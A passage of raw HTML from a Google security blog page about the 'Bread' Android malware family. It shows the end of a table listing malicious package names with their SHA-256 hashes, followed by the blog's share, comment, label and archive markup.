<td>780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 </td> </tr> <tr> <td>com.rongnea.udonood </td> <td>8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 </td> </tr> <tr> <td>com.mbv.a.wp </td> <td>01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 </td> </tr> <tr> <td>com.pho.nec.sg </td> <td>b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b </td> </tr> </tbody></table> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:PHA Family Highlights: Bread (and Friends)&url=https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'>  </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html' data-url='https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> <span class='labels-caption'> Labels: </span> <span class='labels'> <a class='label' href='https://security.googleblog.com/search/label/android' rel='tag'> android </a> , <a class='label' href='https://security.googleblog.com/search/label/android%20security' rel='tag'> android security </a> , <a class='label' href='https://security.googleblog.com/search/label/pha%20family%20highlights' rel='tag'> pha family highlights </a> </span> </div> </div> </div> <div class='blog-pager' id='blog-pager'> <a class='home-link' href='https://security.googleblog.com/'> <i class='material-icons'>  </i> </a> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='https://security.googleblog.com/search?updated-max=2020-03-11T09:00:00-04:00&max-results=10&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Newer Posts'> <i class='material-icons'>  </i> </a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='https://security.googleblog.com/search?updated-max=2020-01-09T16:00:00-05:00&max-results=10' id='Blog1_blog-pager-older-link' title='Older Posts'> <i class='material-icons'>  </i> </a> </span> </div> <div class='clear'></div> </div></div> </div> </div> <div class='col-right'> <div class='section' id='sidebar-top'><div class='widget HTML' data-version='1' id='HTML8'> <div class='widget-content'> <div class='searchBox'> <input type='text' title='Search This Blog' placeholder='Search blog ...' /> </div> </div> <div class='clear'></div> </div></div> <div id='aside'> <div class='section' id='sidebar'><div class='widget Label' data-version='1' id='Label1'> <div class='tab'> <img class='sidebar-icon' src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAYpJREFUeNrs2aFuwzAQBmAvKRkMKRjZA4QMDJaWFgyMjuzFRg37DIUlA3uFkoGQSaWzJU+tpri5O9+l/zSfdFJlpe59yTmyVedq1PjfcZMZ70NuQnaF8w8htyE/rABtpviXkLcK88c5HhLkMBfgVan43zfFBNGMjHVGT/s55KP2pAvidbGHd+nzKt1RKSLG3rKF1iPFv6UWiPke8i7kEqGdGsI1O+LYVdqJAjgirwkKYD0ytkJBUNbAMvX8V3q9PhUsYvU1sWD8SO/sQvx2ahxOiNoJCSBCoAHYCEQAC4EKICOQASQEOmAS8RcAFxFN5hiIiugpgC3wk9hQAHH/70EBHXUN7IER5EWMiBgo2+nzOKQv9SCAeEM/OQAkhE/ncccFICB87qzQMia5FsJfOui0zMnmRvipU1ormHQuxGTxUsAcCFLxJQBLBLn4UoAFglW8BkATwS5eC6CBEBWvCShBiIvXBkgQRcVbADiI4uKtABSESvGWgB9EzHt3+tNwyO0qa9SoIYtvAQYAqDJhaWWeMecAAAAASUVORK5CYII='/> <h2> Labels </h2> <i class='material-icons arrow'>  </i> </div> <div class='widget-content list-label-widget-content'> <ul> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/%23sharethemicincyber'> #sharethemicincyber </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/%23supplychain%20%23security%20%23opensource'> #supplychain #security #opensource </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/android'> android </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/android%20security'> android security </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/android%20tr'> android tr </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/app%20security'> app security </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/big%20data'> big data </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/biometrics'> biometrics </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/blackhat'> blackhat </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/C%2B%2B'> C++ </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/chrome'> chrome </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/chrome%20enterprise'> chrome enterprise </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/chrome%20security'> chrome security </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/connected%20devices'> connected devices </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/CTF'> CTF </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/diversity'> diversity </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/encryption'> encryption </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/federated%20learning'> federated learning </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/fuzzing'> fuzzing </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/Gboard'> Gboard </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/google%20play'> google play </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/google%20play%20protect'> google play protect </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/hacking'> hacking </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/interoperability'> interoperability </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/iot%20security'> iot security </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/kubernetes'> kubernetes </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/linux%20kernel'> linux kernel </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/memory%20safety'> memory safety </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/Open%20Source'> Open Source </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/pha%20family%20highlights'> pha family highlights </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/pixel'> pixel </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/privacy'> privacy </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/private%20compute%20core'> private compute core </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/Rowhammer'> Rowhammer </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/rust'> rust </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/Security'> Security </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/security%20rewards%20program'> security rewards program </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/sigstore'> sigstore </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/spyware'> spyware </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/supply%20chain'> supply chain </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/targeted%20spyware'> targeted spyware </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/tensor'> tensor </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/Titan%20M2'> Titan M2 </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/VDP'> VDP </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/vulnerabilities'> vulnerabilities </a> </li> <li> <a dir='ltr' href='https://security.googleblog.com/search/label/workshop'> workshop </a> </li> </ul> <div class='clear'></div> </div> </div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'> <div class='tab'> <i class='material-icons icon'>  </i> <h2> Archive </h2> <i class='material-icons arrow'>  </i> </div> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2024/'> 2024 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2024/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2023/'> 2023 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2023/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2022/'> 2022 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2022/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2021/'> 2021 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2021/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy toggle-open'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2020/'> 2020 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2020/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2019/'> 2019 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2019/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2018/'> 2018 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2018/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2017/'> 2017 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2016/'> 2016 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li 